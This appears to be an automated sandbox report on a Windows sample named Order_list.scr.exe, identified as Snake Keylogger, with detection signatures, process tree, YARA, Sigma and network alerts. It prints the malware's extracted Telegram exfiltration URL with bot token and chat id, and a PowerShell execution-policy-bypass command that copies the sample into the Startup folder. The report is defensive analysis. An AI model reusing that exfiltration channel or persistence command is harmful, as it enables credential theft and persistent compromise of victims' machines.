Edit tour

Windows Analysis Report
Order_list.scr.exe

Overview

General Information

Sample name:	Order_list.scr.exe
Analysis ID:	1589903
MD5:	f614cd44a2ca0676523d3f9d23ae23b2
SHA1:	c5656616f7095e6b19c995b2528c984234d8e3ed
SHA256:	b37e686fd31a86e8ace7bac6a862b1388241527af590a168c294801cfbecd5b1
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Copy file to startup via Powershell

Yara detected AntiVM3

Yara detected Snake Keylogger

AI detected suspicious sample

Bypasses PowerShell execution policy

Drops PE files to the startup folder

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Powershell drops PE file

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Order_list.scr.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Order_list.scr.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)

powershell.exe (PID: 7048 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Order_list.scr.exe (PID: 3584 cmdline: "C:\Users\user\Desktop\Order_list.scr.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)

svchost.exe (PID: 2896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

00.exe (PID: 7076 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)

powershell.exe (PID: 6260 cmdline: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

00.exe (PID: 6256 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe" MD5: F614CD44A2CA0676523D3F9D23AE23B2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ/sendMessage?chat_id=7222025033", "Token": "7888110857:AAH_lE30nomQfyzYUPPXbGWeGI9ffBUijsQ", "Chat_id": "7222025033", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x8a4:$x1: $%SMTPDV$ 0x84c:$x3: %FTPDV$ 0x870:$m2: Clipboard Logs ID 0xaae:$m2: Screenshot Logs ID 0xbbe:$m2: keystroke Logs ID 0xe98:$m3: SnakePW 0xa86:$m4: \SnakeKeylogger\
00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6b24:$a1: get_encryptedPassword 0x6e10:$a2: get_encryptedUsername 0x6930:$a3: get_timePasswordChanged 0x6a2b:$a4: get_passwordField 0x6b3a:$a5: set_encryptedPassword 0x8247:$a7: get_logins 0x81aa:$a10: KeyLoggerEventArgs 0x7e15:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xbaf4:$x1: $%SMTPDV$ 0xa4d8:$x2: $#TheHashHere%& 0xba9c:$x3: %FTPDV$ 0xa478:$x4: $%TelegramDv$ 0x7e15:$x5: KeyLoggerEventArgs 0x81aa:$x5: KeyLoggerEventArgs 0xbac0:$m2: Clipboard Logs ID 0xbcfe:$m2: Screenshot Logs ID 0xbe0e:$m2: keystroke Logs ID 0xc0e8:$m3: SnakePW 0xbcd6:$m4: \SnakeKeylogger\
00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a304:$a1: get_encryptedPassword 0x1a5f0:$a2: get_encryptedUsername 0x1a110:$a3: get_timePasswordChanged 0x1a20b:$a4: get_passwordField 0x1a31a:$a5: set_encryptedPassword 0x1ba27:$a7: get_logins 0x1b98a:$a10: KeyLoggerEventArgs 0x1b5f5:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4aeb9:$x1: In$J$ct0r
00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2d4:$x1: $%SMTPDV$ 0x27c:$x3: %FTPDV$ 0x2a0:$m2: Clipboard Logs ID 0x4de:$m2: Screenshot Logs ID 0x5ee:$m2: keystroke Logs ID 0x8c8:$m3: SnakePW 0x4b6:$m4: \SnakeKeylogger\
00000003.00000002.4141697018.000000000348B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148c4:$a1: get_encryptedPassword 0x14bb0:$a2: get_encryptedUsername 0x146d0:$a3: get_timePasswordChanged 0x147cb:$a4: get_passwordField 0x148da:$a5: set_encryptedPassword 0x15fe7:$a7: get_logins 0x15f4a:$a10: KeyLoggerEventArgs 0x15bb5:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19894:$x1: $%SMTPDV$ 0x18278:$x2: $#TheHashHere%& 0x1983c:$x3: %FTPDV$ 0x18218:$x4: $%TelegramDv$ 0x15bb5:$x5: KeyLoggerEventArgs 0x15f4a:$x5: KeyLoggerEventArgs 0x19860:$m2: Clipboard Logs ID 0x19a9e:$m2: Screenshot Logs ID 0x19bae:$m2: keystroke Logs ID 0x19e88:$m3: SnakePW 0x19a76:$m4: \SnakeKeylogger\
00000000.00000002.4164055265.0000000003711000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4142946161.00000000028FD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Order_list.scr.exe PID: 6984	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Order_list.scr.exe PID: 6984	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Order_list.scr.exe PID: 6984	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Order_list.scr.exe PID: 3584	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Order_list.scr.exe PID: 3584	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Order_list.scr.exe PID: 3584	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x38c24:$a1: get_encryptedPassword 0x38f06:$a2: get_encryptedUsername 0x38a3a:$a3: get_timePasswordChanged 0x38b35:$a4: get_passwordField 0x38c3a:$a5: set_encryptedPassword 0x3b11a:$a7: get_logins 0x3b07d:$a10: KeyLoggerEventArgs 0x3ace8:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Order_list.scr.exe PID: 3584	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3ace8:$x5: KeyLoggerEventArgs 0x3b07d:$x5: KeyLoggerEventArgs 0x3b64a:$x5: KeyLoggerEventArgs 0x3b9ab:$x5: KeyLoggerEventArgs 0x3d2ab:$m2: Clipboard Logs ID 0x3d3b1:$m2: Screenshot Logs ID 0x3d407:$m2: keystroke Logs ID 0x3d53c:$m3: SnakePW 0x3d39d:$m4: \SnakeKeylogger\
Process Memory Space: 00.exe PID: 7076	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 00.exe PID: 7076	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 00.exe PID: 7076	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: 00.exe PID: 7076	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34d6:$a1: get_encryptedPassword 0x8213:$a1: get_encryptedPassword 0x37b8:$a2: get_encryptedUsername 0x84f5:$a2: get_encryptedUsername 0x32ec:$a3: get_timePasswordChanged 0x8029:$a3: get_timePasswordChanged 0x33e7:$a4: get_passwordField 0x8124:$a4: get_passwordField 0x34ec:$a5: set_encryptedPassword 0x8229:$a5: set_encryptedPassword 0x59c3:$a7: get_logins 0xa709:$a7: get_logins 0x5926:$a10: KeyLoggerEventArgs 0xa66c:$a10: KeyLoggerEventArgs 0x5d142:$a10: KeyLoggerEventArgs 0x5591:$a11: KeyLoggerEventArgsEventHandler 0xa2d7:$a11: KeyLoggerEventArgsEventHandler 0x5cdad:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 00.exe PID: 7076	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5591:$x5: KeyLoggerEventArgs 0x5926:$x5: KeyLoggerEventArgs 0x5ef3:$x5: KeyLoggerEventArgs 0x6254:$x5: KeyLoggerEventArgs 0xa2d7:$x5: KeyLoggerEventArgs 0xa66c:$x5: KeyLoggerEventArgs 0xac39:$x5: KeyLoggerEventArgs 0xaf9a:$x5: KeyLoggerEventArgs 0x5cdad:$x5: KeyLoggerEventArgs 0x5d142:$x5: KeyLoggerEventArgs 0x5d5a9:$x5: KeyLoggerEventArgs 0x5d90a:$x5: KeyLoggerEventArgs 0xc89a:$m2: Clipboard Logs ID 0xc9a0:$m2: Screenshot Logs ID 0xc9f6:$m2: keystroke Logs ID 0xea20:$m2: Clipboard Logs ID 0xeb26:$m2: Screenshot Logs ID 0xeb7c:$m2: keystroke Logs ID 0x59917:$m2: Clipboard Logs ID 0x59a1d:$m2: Screenshot Logs ID 0x59a73:$m2: keystroke Logs ID
Process Memory Space: 00.exe PID: 6256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 00.exe PID: 6256	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Order_list.scr.exe.3719840.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Order_list.scr.exe.29590ec.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20a4:$x1: In$J$ct0r 0xa2de0:$a1: WriteProcessMemory 0xa2e6c:$a1: WriteProcessMemory 0xa2f40:$a4: VirtualAllocEx 0xa3164:$a4: VirtualAllocEx 0xa31e4:$a4: VirtualAllocEx
0.2.Order_list.scr.exe.4d40000.5.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x490b9:$x1: In$J$ct0r
5.2.00.exe.3a39840.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.00.exe.3a39840.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ac4:$a1: get_encryptedPassword 0x14db0:$a2: get_encryptedUsername 0x148d0:$a3: get_timePasswordChanged 0x149cb:$a4: get_passwordField 0x14ada:$a5: set_encryptedPassword 0x161e7:$a7: get_logins 0x1614a:$a10: KeyLoggerEventArgs 0x15db5:$a11: KeyLoggerEventArgsEventHandler
5.2.00.exe.3a39840.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15707:$s1: UnHook 0x1570e:$s2: SetHook 0x15716:$s3: CallNextHook 0x15723:$s4: _hook
0.2.Order_list.scr.exe.4d40000.5.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x4aeb9:$x1: In$J$ct0r
0.2.Order_list.scr.exe.3668570.3.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x490b9:$x1: In$J$ct0r
0.2.Order_list.scr.exe.29568ac.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48e4:$x1: In$J$ct0r 0xa5620:$a1: WriteProcessMemory 0xa56ac:$a1: WriteProcessMemory 0xa5780:$a4: VirtualAllocEx 0xa59a4:$a4: VirtualAllocEx 0xa5a24:$a4: VirtualAllocEx
5.2.00.exe.3a18e10.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.00.exe.3a18e10.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a64a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1987c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19caf:$a4: \Orbitum\User Data\Default\Login Data 0x1acee:$a5: \Kometa\User Data\Default\Login Data
5.2.00.exe.3a18e10.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13907:$s1: UnHook 0x1390e:$s2: SetHook 0x13916:$s3: CallNextHook 0x13923:$s4: _hook
5.2.00.exe.3a18e10.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c94:$x1: $%SMTPDV$ 0x17c3c:$x3: %FTPDV$ 0x13fb5:$x5: KeyLoggerEventArgs 0x1434a:$x5: KeyLoggerEventArgs 0x17c60:$m2: Clipboard Logs ID 0x17e9e:$m2: Screenshot Logs ID 0x17fae:$m2: keystroke Logs ID 0x18288:$m3: SnakePW 0x17e76:$m4: \SnakeKeylogger\
5.2.00.exe.2c76d58.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa48e4:$x1: In$J$ct0r 0xa5674:$a1: WriteProcessMemory 0xa5700:$a1: WriteProcessMemory 0xa57d4:$a4: VirtualAllocEx 0xa59f8:$a4: VirtualAllocEx 0xa5a78:$a4: VirtualAllocEx
5.2.00.exe.3a39840.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.00.exe.3a39840.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12cc4:$a1: get_encryptedPassword 0x12fb0:$a2: get_encryptedUsername 0x12ad0:$a3: get_timePasswordChanged 0x12bcb:$a4: get_passwordField 0x12cda:$a5: set_encryptedPassword 0x143e7:$a7: get_logins 0x1434a:$a10: KeyLoggerEventArgs 0x13fb5:$a11: KeyLoggerEventArgsEventHandler
5.2.00.exe.3a39840.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13907:$s1: UnHook 0x1390e:$s2: SetHook 0x13916:$s3: CallNextHook 0x13923:$s4: _hook
5.2.00.exe.3a39840.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c94:$x1: $%SMTPDV$ 0x16678:$x2: $#TheHashHere%& 0x17c3c:$x3: %FTPDV$ 0x16618:$x4: $%TelegramDv$ 0x13fb5:$x5: KeyLoggerEventArgs 0x1434a:$x5: KeyLoggerEventArgs 0x17c60:$m2: Clipboard Logs ID 0x17e9e:$m2: Screenshot Logs ID 0x17fae:$m2: keystroke Logs ID 0x18288:$m3: SnakePW 0x17e76:$m4: \SnakeKeylogger\
5.2.00.exe.2c79598.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20a4:$x1: In$J$ct0r 0xa2e34:$a1: WriteProcessMemory 0xa2ec0:$a1: WriteProcessMemory 0xa2f94:$a4: VirtualAllocEx 0xa31b8:$a4: VirtualAllocEx 0xa3238:$a4: VirtualAllocEx
3.2.Order_list.scr.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Order_list.scr.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.Order_list.scr.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
3.2.Order_list.scr.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ac4:$a1: get_encryptedPassword 0x14db0:$a2: get_encryptedUsername 0x148d0:$a3: get_timePasswordChanged 0x149cb:$a4: get_passwordField 0x14ada:$a5: set_encryptedPassword 0x161e7:$a7: get_logins 0x1614a:$a10: KeyLoggerEventArgs 0x15db5:$a11: KeyLoggerEventArgsEventHandler
3.2.Order_list.scr.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c44a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b67c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1baaf:$a4: \Orbitum\User Data\Default\Login Data 0x1caee:$a5: \Kometa\User Data\Default\Login Data
3.2.Order_list.scr.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15707:$s1: UnHook 0x1570e:$s2: SetHook 0x15716:$s3: CallNextHook 0x15723:$s4: _hook
3.2.Order_list.scr.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a94:$x1: $%SMTPDV$ 0x18478:$x2: $#TheHashHere%& 0x19a3c:$x3: %FTPDV$ 0x18418:$x4: $%TelegramDv$ 0x15db5:$x5: KeyLoggerEventArgs 0x1614a:$x5: KeyLoggerEventArgs 0x19a60:$m2: Clipboard Logs ID 0x19c9e:$m2: Screenshot Logs ID 0x19dae:$m2: keystroke Logs ID 0x1a088:$m3: SnakePW 0x19c76:$m4: \SnakeKeylogger\
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order_list.scr.exe", ParentImage: C:\Users\user\Desktop\Order_list.scr.exe, ParentProcessId: 6984, ParentProcessName: Order_list.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 7048, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7048, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7048, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order_list.scr.exe", ParentImage: C:\Users\user\Desktop\Order_list.scr.exe, ParentProcessId: 6984, ParentProcessName: Order_list.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 7048, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2896, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Order_list.scr.exe", ParentImage: C:\Users\user\Desktop\Order_list.scr.exe, ParentProcessId: 6984, ParentProcessName: Order_list.scr.exe, ProcessCommandLine: "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe', ProcessId: 7048, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T10:12:07.123853+0100	2803305	3	Unknown Traffic	192.168.2.4	49734	104.21.64.1	443	TCP
2025-01-13T10:12:08.548593+0100	2803305	3	Unknown Traffic	192.168.2.4	49737	104.21.64.1	443	TCP
2025-01-13T10:12:09.858094+0100	2803305	3	Unknown Traffic	192.168.2.4	49739	104.21.64.1	443	TCP
2025-01-13T10:12:12.501706+0100	2803305	3	Unknown Traffic	192.168.2.4	49745	104.21.64.1	443	TCP
2025-01-13T10:12:15.127412+0100	2803305	3	Unknown Traffic	192.168.2.4	49749	104.21.64.1	443	TCP
2025-01-13T10:12:20.906180+0100	2803305	3	Unknown Traffic	192.168.2.4	49754	104.21.64.1	443	TCP
2025-01-13T10:12:25.293521+0100	2803305	3	Unknown Traffic	192.168.2.4	49762	104.21.64.1	443	TCP
2025-01-13T10:12:29.316786+0100	2803305	3	Unknown Traffic	192.168.2.4	49768	104.21.64.1	443	TCP
2025-01-13T10:12:30.638274+0100	2803305	3	Unknown Traffic	192.168.2.4	49770	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T10:12:05.613559+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	132.226.247.73	80	TCP
2025-01-13T10:12:06.535491+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	132.226.247.73	80	TCP
2025-01-13T10:12:07.973199+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49736	132.226.247.73	80	TCP
2025-01-13T10:12:19.285548+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49750	132.226.247.73	80	TCP
